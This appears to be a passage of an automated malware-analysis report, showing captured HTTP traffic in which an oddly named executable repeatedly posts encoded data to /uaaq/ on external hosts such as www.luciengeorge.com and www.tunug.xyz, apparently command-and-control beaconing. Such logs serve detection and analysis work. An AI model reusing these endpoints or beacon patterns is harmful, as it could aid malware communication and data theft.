                                                                                    Data Raw: 39 70 47 30 4c 3d 53 6b 76 64 78 45 7a 69 63 7a 39 35 33 79 52 37 75 69 68 46 71 63 48 7a 58 7a 6c 7a 52 4b 55 44 6b 4d 57 2b 44 61 44 68 2f 47 6b 33 75 6d 62 66 69 37 48 36 55 6e 67 55 62 79 32 48 63 71 5a 4d 7a 6c 71 75 2f 33 73 5a 67 6d 4a 57 36 4b 73 77 4f 76 47 47 53 74 67 56 47 38 46 38 70 47 79 61 35 42 78 73 5a 4b 6f 75 6d 53 36 37 45 4b 54 59 43 4f 6f 78 79 6c 64 6c 35 66 34 6d 62 72 47 6f 64 2b 4c 4e 4c 70 37 53 41 5a 2f 68 6b 53 7a 62 55 4f 6c 50 4c 39 48 61 6d 37 33 6a 50 6f 57 76 51 7a 39 62 50 77 4b 43 65 57 65 2b 58 4a 6c 6d 2b 77 3d 3d
                                                                                    Data Ascii: 9pG0L=SkvdxEzicz953yR7uihFqcHzXzlzRKUDkMW+DaDh/Gk3umbfi7H6UngUby2HcqZMzlqu/3sZgmJW6KswOvGGStgVG8F8pGya5BxsZKoumS67EKTYCOoxyldl5f4mbrGod+LNLp7SAZ/hkSzbUOlPL9Ham73jPoWvQz9bPwKCeWe+XJlm+w==
                                                                                    Dec 4, 2023 12:07:29.144299984 CET1005INHTTP/1.1 301 Moved Permanently
                                                                                    Server: Cowboy
                                                                                    Date: Mon, 04 Dec 2023 11:07:28 GMT
                                                                                    Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1701688049&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=57tq261GbKVfQdutv4DNYS7MbPZutrLZvrGKDS9eUSM%3D"}]}
                                                                                    Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1701688049&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=57tq261GbKVfQdutv4DNYS7MbPZutrLZvrGKDS9eUSM%3D
                                                                                    Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Content-Type: text/html
                                                                                    Location: http://www.lucien.dev/uaaq/
                                                                                    Content-Length: 214
                                                                                    Via: 1.1 vegur
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 75 63 69 65 6e 2e 64 65 76 2f 75 61 61 71 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.lucien.dev/uaaq/">here</a>.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.11.304979654.73.26.109803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:07:31.671689034 CET724OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.luciengeorge.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.luciengeorge.com
                                                                                    Referer: http://www.luciengeorge.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 53 6b 76 64 78 45 7a 69 63 7a 39 35 32 52 4a 37 69 68 4a 46 37 73 48 77 55 7a 6c 7a 61 71 55 59 6b 4d 61 2b 44 62 33 78 2f 30 41 33 75 48 72 66 6a 36 48 36 54 6e 67 55 50 43 33 4e 52 4b 5a 78 7a 6c 6e 4f 2f 79 4d 5a 67 6d 64 57 36 49 30 77 4f 63 76 51 41 74 67 74 4e 63 46 2b 6e 6d 79 61 35 42 78 73 5a 4b 38 45 6d 57 57 37 44 2b 58 59 43 76 6f 79 2f 46 64 6b 74 50 34 6d 4b 37 47 73 64 2b 4b 59 4c 70 4b 35 41 63 37 68 6b 51 72 62 54 66 6b 5a 43 39 48 59 69 37 32 50 66 4b 62 6c 65 53 45 43 4b 44 79 5a 41 6d 62 50 62 38 4a 31 35 49 37 64 54 51 6e 2f 45 50 51 6d 63 39 6d 79 67 78 70 6d 42 7a 63 3d
                                                                                    Data Ascii: 9pG0L=SkvdxEzicz952RJ7ihJF7sHwUzlzaqUYkMa+Db3x/0A3uHrfj6H6TngUPC3NRKZxzlnO/yMZgmdW6I0wOcvQAtgtNcF+nmya5BxsZK8EmWW7D+XYCvoy/FdktP4mK7Gsd+KYLpK5Ac7hkQrbTfkZC9HYi72PfKbleSECKDyZAmbPb8J15I7dTQn/EPQmc9mygxpmBzc=
                                                                                    Dec 4, 2023 12:07:31.858505964 CET1013INHTTP/1.1 301 Moved Permanently
                                                                                    Server: Cowboy
                                                                                    Date: Mon, 04 Dec 2023 11:07:31 GMT
                                                                                    Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1701688051&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=HAErWp3obUTQBZA%2Fj9BoB%2Bsgw67ZD1EMsia7DE9SjQg%3D"}]}
                                                                                    Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1701688051&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=HAErWp3obUTQBZA%2Fj9BoB%2Bsgw67ZD1EMsia7DE9SjQg%3D
                                                                                    Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Content-Type: text/html
                                                                                    Location: http://www.lucien.dev/uaaq/
                                                                                    Content-Length: 214
                                                                                    Via: 1.1 vegur
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 75 63 69 65 6e 2e 64 65 76 2f 75 61 61 71 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.lucien.dev/uaaq/">here</a>.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    43192.168.11.304979754.73.26.109803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:07:34.374680042 CET1641OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.luciengeorge.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.luciengeorge.com
                                                                                    Referer: http://www.luciengeorge.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 53 6b 76 64 78 45 7a 69 63 7a 39 35 32 52 4a 37 69 68 4a 46 37 73 48 77 55 7a 6c 7a 61 71 55 59 6b 4d 61 2b 44 62 33 78 2f 30 49 33 75 56 54 66 6a 5a 66 36 53 6e 67 55 54 53 33 4f 52 4b 5a 67 7a 6c 76 52 2f 79 49 57 67 6b 6c 57 34 74 67 77 49 74 76 51 4b 74 67 74 43 38 46 2f 70 47 79 4c 35 42 68 6f 5a 4b 73 45 6d 57 57 37 44 34 37 59 4c 65 6f 79 73 31 64 6c 35 66 34 71 62 72 47 41 64 2b 53 49 4c 6f 2b 50 41 76 7a 68 6b 7a 54 62 56 74 4d 5a 41 64 48 65 6c 37 32 58 66 4b 58 6d 65 53 5a 78 4b 43 32 6e 41 6c 4c 50 58 59 6b 65 6f 5a 54 4a 50 44 33 44 4e 4f 38 61 62 35 32 45 31 52 52 6c 62 6b 32 4f 55 4a 67 6a 62 2f 54 52 49 66 4f 38 46 74 51 61 78 48 52 5a 59 4f 77 46 2b 64 38 55 4c 75 53 7a 6c 52 43 69 42 78 33 6d 75 54 36 66 75 64 56 4f 41 4d 75 66 61 54 49 75 6f 51 78 70 68 64 44 56 59 31 42 37 4e 69 70 39 6f 75 51 30 55 46 75 49 62 72 30 57 54 54 38 4c 68 4f 48 6d 55 72 4e 6b 6c 4a 38 58 58 4d 4c 72 78 6b 6d 2b 72 41 5a 6e 5a 6c 6e 56 54 2f 69 4e 6a 2b 41 38 31 79 70 58 72 50 6f 35 48 31 4d 6c 76 65 78 55 55 48 74 4a 71 33 61 56 35 52 72 31 44 7a 48 4a 58 51 44 32 56 2b 77 44 62 55 7a 4a 58 38 71 32 51 45 4f 46 6b 65 6c 41 36 6f 57 34 65 31 59 54 43 4f 50 69 72 6c 7a 58 6a 32 38 33 46 62 53 4c 4c 62 35 37 78 5a 39 58 35 46 57 47 55 6a 33 54 62 34 4b 76 44 69 33 4e 43 65 30 52 55 4f 61 78 36 65 54 57 57 53 77 62 68 6e 68 56 56 4a 39 75 47 47 4e 78 4a 66 5a 46 63 62 46 77 78 53 4a 62 36 54 6e 4b 41 58 59 72 76 56 45 32 4b 37 30 61 4c 42 36 77 63 50 37 39 4d 47 62 7a 2b 39 7a 57 33 56 4a 71 75 51 69 41 63 77 70 4a 35 38 6d 6b 61 64 46 44 48 65 4e 55 68 71 72 6f 37 64 55 39 74 2f 35 52 4c 63 36 51 71 2b 39 4e 62 34 68 2f 54 78 42 30 54 64 65 52 58 66 4f 54 73 4f 62 74 34 75 48 4d 30 6f 43 77 6c 64 56 68 50 52 76 43 31 69 78 65 45 53 5a 65 53 6d 39 54 49 68 52 72 4e 4b 30 35 66 48 35 30 74 75 53 6f 32 55 6e 39 55 79 4f 2b 36 56 7a 78 62 35 6c 45 2f 4c 77 7a 4f 39 62 4a 53 76 4f 71 49 4b 44 55 39 35 37 74 7a 7a 65 52 73 48 4e 33 2b 6b 39 6a 65 48 31 54 48 50 36 69 6b 67 46 46 31 57 58 7a 70 6b 46 35 4b 42 6d 61 31 36 54 44 59 2f 74 59 38 6b 61 65 4b 39 42 32 7a 36 38 50 63 6d 45 4d 58 76 35 6f 43 79 4f 52 79 78 4a 51 69 6f 6c 4f 65 64 4c 38 64 69 32 66 6c 31 6e 56 31 38 62 64 76 4e 59 72 7a 35 4f 78 4a 42 31 67 33 6a 41 39 77 73 68 55 6c 63 45 65 4d 36 58 4a 56 5a 54 4b 4d 74 66 53 49 71 57 72 34 45 77 54 46 37 71 45 51 59 64 52 32 4e 7a 59 75 72 55 6f 70 6d 66 48 6b 61 76 51 47 45 64 59 76 52 68 69 39 53 6c 74 6c 75 42 2f 54 76 39 6d 48 66 4a 44 58 33 64 58 41 66 2b 57 4c 48 31 57 57 6b 69 59 79 2f 4f 6a 6b 74 61 69 74 6e 6f 30 42 35 66 48 62 41 7a 4c 57 31 4b 69 6a 76 6c 77 51 44 48 6f 39 33 4f 70 68 37 44 74 46 79 78 61 4c 39 46 6b 30 44 62 62 62 75 62 48 50 65 63 48 72 6d 73 77 79 2b 4c 48 38 79 7a 35 59 67 4d 76 5a 68 57 47 55 48 45 2b 32 31 4d 4b 36 69 54 62 59 5a 65 6d 50 62 32 69 44 53 33 76 64 42 52 48 55 67 38 47 37 70 36 68 72 77 70 33 46 33 54 4a 6b 77 31 78 44 4e 67 58 4b 45 4d 70 6f 6e 2f 69 2f 4c 33 6c 56 38 35 64 69 63 54 6e 6e 2b 63 64 50 38 6d 50 50 6e 77 51 31 77 48 39 57 30 44 4b 4f 78 2b 2f 2f 6b 6d 33 38 58 4a 49 6b 4b 6a 6c 50 68 64 50 76 6f 51 39 37 55 63 2f 44 43 43 72 56 66 4c 53 41 70 55 48 46 6b 58 54 46 71 79 4c 47 75 6a 59 62 41 77 39 52 31 6c 46 6c 53 6e 62 59 5a 75 77 6d 45 30 74 78 38 55 6e 50 37 32 77 31 56 4c 4a 61 57 2f 74 78 55 36 6e 38 4e 53 4e 79 66 77 37
                                                                                    Data Ascii: 9pG0L=SkvdxEzicz952RJ7ihJF7sHwUzlzaqUYkMa+Db3x/0I3uVTfjZf6SngUTS3ORKZgzlvR/yIWgklW4tgwItvQKtgtC8F/pGyL5BhoZKsEmWW7D47YLeoys1dl5f4qbrGAd+SILo+PAvzhkzTbVtMZAdHel72XfKXmeSZxKC2nAlLPXYkeoZTJPD3DNO8ab52E1RRlbk2OUJgjb/TRIfO8FtQaxHRZYOwF+d8ULuSzlRCiBx3muT6fudVOAMufaTIuoQxphdDVY1B7Nip9ouQ0UFuIbr0WTT8LhOHmUrNklJ8XXMLrxkm+rAZnZlnVT/iNj+A81ypXrPo5H1MlvexUUHtJq3aV5Rr1DzHJXQD2V+wDbUzJX8q2QEOFkelA6oW4e1YTCOPirlzXj283FbSLLb57xZ9X5FWGUj3Tb4KvDi3NCe0RUOax6eTWWSwbhnhVVJ9uGGNxJfZFcbFwxSJb6TnKAXYrvVE2K70aLB6wcP79MGbz+9zW3VJquQiAcwpJ58mkadFDHeNUhqro7dU9t/5RLc6Qq+9Nb4h/TxB0TdeRXfOTsObt4uHM0oCwldVhPRvC1ixeESZeSm9TIhRrNK05fH50tuSo2Un9UyO+6Vzxb5lE/LwzO9bJSvOqIKDU957tzzeRsHN3+k9jeH1THP6ikgFF1WXzpkF5KBma16TDY/tY8kaeK9B2z68PcmEMXv5oCyORyxJQiolOedL8di2fl1nV18bdvNYrz5OxJB1g3jA9wshUlcEeM6XJVZTKMtfSIqWr4EwTF7qEQYdR2NzYurUopmfHkavQGEdYvRhi9SltluB/Tv9mHfJDX3dXAf+WLH1WWkiYy/Ojktaitno0B5fHbAzLW1KijvlwQDHo93Oph7DtFyxaL9Fk0DbbbubHPecHrmswy+LH8yz5YgMvZhWGUHE+21MK6iTbYZemPb2iDS3vdBRHUg8G7p6hrwp3F3TJkw1xDNgXKEMpon/i/L3lV85dicTnn+cdP8mPPnwQ1wH9W0DKOx+//km38XJIkKjlPhdPvoQ97Uc/DCCrVfLSApUHFkXTFqyLGujYbAw9R1lFlSnbYZuwmE0tx8UnP72w1VLJaW/txU6n8NSNyfw7
                                                                                    Dec 4, 2023 12:07:34.561839104 CET1013INHTTP/1.1 301 Moved Permanently
                                                                                    Server: Cowboy
                                                                                    Date: Mon, 04 Dec 2023 11:07:33 GMT
                                                                                    Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1701688054&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=87NehU4sJxCU3CwD1LJ%2FLI0QkNjZM4w4R8K9dzO%2B1bk%3D"}]}
                                                                                    Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1701688054&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=87NehU4sJxCU3CwD1LJ%2FLI0QkNjZM4w4R8K9dzO%2B1bk%3D
                                                                                    Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Content-Type: text/html
                                                                                    Location: http://www.lucien.dev/uaaq/
                                                                                    Content-Length: 214
                                                                                    Via: 1.1 vegur
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 75 63 69 65 6e 2e 64 65 76 2f 75 61 61 71 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.lucien.dev/uaaq/">here</a>.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    44192.168.11.304979854.73.26.109803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:07:37.077152014 CET428OUTGET /uaaq/?9pG0L=fmH9yz//bCxvzW52vWt98M+uaVtRGNwHjsHeAa3s9TBNvVrXrI6jb3VoW2ynR6RQyk2x+GY+m0JVnac7FabBN9cfOPAzgTn6pg==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.luciengeorge.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:07:37.263576031 CET1267INHTTP/1.1 301 Moved Permanently
                                                                                    Server: Cowboy
                                                                                    Date: Mon, 04 Dec 2023 11:07:36 GMT
                                                                                    Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1701688057&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=84prChwYVrdPSN%2Bj2%2FiO22IpUHjxeGL%2Fguvnh%2BiLsaU%3D"}]}
                                                                                    Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1701688057&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=84prChwYVrdPSN%2Bj2%2FiO22IpUHjxeGL%2Fguvnh%2BiLsaU%3D
                                                                                    Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Content-Type: text/html
                                                                                    Location: http://www.lucien.dev/uaaq/?9pG0L=fmH9yz//bCxvzW52vWt98M+uaVtRGNwHjsHeAa3s9TBNvVrXrI6jb3VoW2ynR6RQyk2x+GY+m0JVnac7FabBN9cfOPAzgTn6pg==&XFs82=6R5Xx6907
                                                                                    Content-Length: 337
                                                                                    Via: 1.1 vegur
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 75 63 69 65 6e 2e 64 65 76 2f 75 61 61 71 2f 3f 39 70 47 30 4c 3d 66 6d 48 39 79 7a 2f 2f 62 43 78 76 7a 57 35 32 76 57 74 39 38 4d 2b 75 61 56 74 52 47 4e 77 48 6a 73 48 65 41 61 33 73 39 54 42 4e 76 56 72 58 72 49 36 6a 62 33 56 6f 57 32 79 6e 52 36 52 51 79 6b 32 78 2b 47 59 2b 6d 30 4a 56 6e 61 63 37 46 61 62 42 4e 39 63 66 4f 50 41 7a 67 54 6e 36 70 67 3d 3d 26 58 46 73 38 32 3d 36 52 35 58 78 36 39 30 37 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.lucien.dev/uaaq/?9pG0L=fmH9yz//bCxvzW52vWt98M+uaVtRGNwHjsHeAa3s9TBNvVrXrI6jb3VoW2ynR6RQyk2x+GY+m0JVnac7FabBN9cfOPAzgTn6pg==&XFs82=6R5Xx6907">here</a>.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.11.304979931.186.11.254803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:07:51.421771049 CET683OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.tunug.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tunug.xyz
                                                                                    Referer: http://www.tunug.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 52 38 53 7a 66 58 6f 48 32 62 58 68 59 49 30 77 62 43 58 56 67 44 46 58 30 2f 7a 67 68 54 4e 51 76 48 61 57 67 4f 44 4c 58 35 57 49 50 65 62 69 62 75 39 7a 36 6f 4c 74 59 56 2b 58 31 52 62 2f 4e 53 43 44 76 42 33 36 54 4e 2f 45 31 74 76 52 62 4f 4c 54 67 38 78 49 31 4a 50 34 6e 49 4f 43 4d 76 58 47 4d 4e 66 79 35 6c 76 79 4f 54 51 77 50 4f 75 76 45 6c 43 50 2f 6e 39 66 69 72 79 63 75 7a 51 51 75 41 56 43 4d 51 37 56 4b 31 73 4f 62 58 46 6f 43 71 78 32 50 4b 74 38 74 47 45 6f 30 4e 45 42 59 38 32 73 52 65 70 4c 31 6e 44 33 45 77 3d 3d
                                                                                    Data Ascii: 9pG0L=R8SzfXoH2bXhYI0wbCXVgDFX0/zghTNQvHaWgODLX5WIPebibu9z6oLtYV+X1Rb/NSCDvB36TN/E1tvRbOLTg8xI1JP4nIOCMvXGMNfy5lvyOTQwPOuvElCP/n9firycuzQQuAVCMQ7VK1sObXFoCqx2PKt8tGEo0NEBY82sRepL1nD3Ew==
                                                                                    Dec 4, 2023 12:07:51.637972116 CET516INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:09 GMT
                                                                                    Server: Apache/2.2.15 (CentOS)
                                                                                    Content-Length: 282
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 61 61 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 75 6e 75 67 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uaaq/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.tunug.xyz Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    46192.168.11.304980031.186.11.254803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:07:54.166981936 CET703OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.tunug.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tunug.xyz
                                                                                    Referer: http://www.tunug.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 52 38 53 7a 66 58 6f 48 32 62 58 68 61 6f 45 77 4c 54 58 56 6d 6a 46 51 36 66 7a 67 34 44 4e 55 76 48 6d 57 67 4c 69 4f 43 61 79 49 4f 2f 72 69 61 76 39 7a 35 6f 4c 74 51 31 2b 53 6f 68 62 30 4e 53 65 36 76 41 4c 36 54 4a 58 45 31 74 66 52 62 39 6a 51 67 73 78 4b 73 5a 50 6d 36 59 4f 43 4d 76 58 47 4d 4e 4c 49 35 6c 33 79 50 67 49 77 4f 72 44 35 4e 46 43 4f 6f 58 39 66 6f 37 79 41 75 7a 51 35 75 43 68 34 4d 54 44 56 4b 33 30 4f 63 47 45 2b 4c 71 78 30 4c 4b 73 59 6a 33 45 73 30 4e 77 4d 4a 66 6d 2f 50 75 35 46 39 53 76 6b 44 44 68 4d 4a 67 50 58 68 62 56 70 75 57 66 68 66 65 5a 36 61 71 45 3d
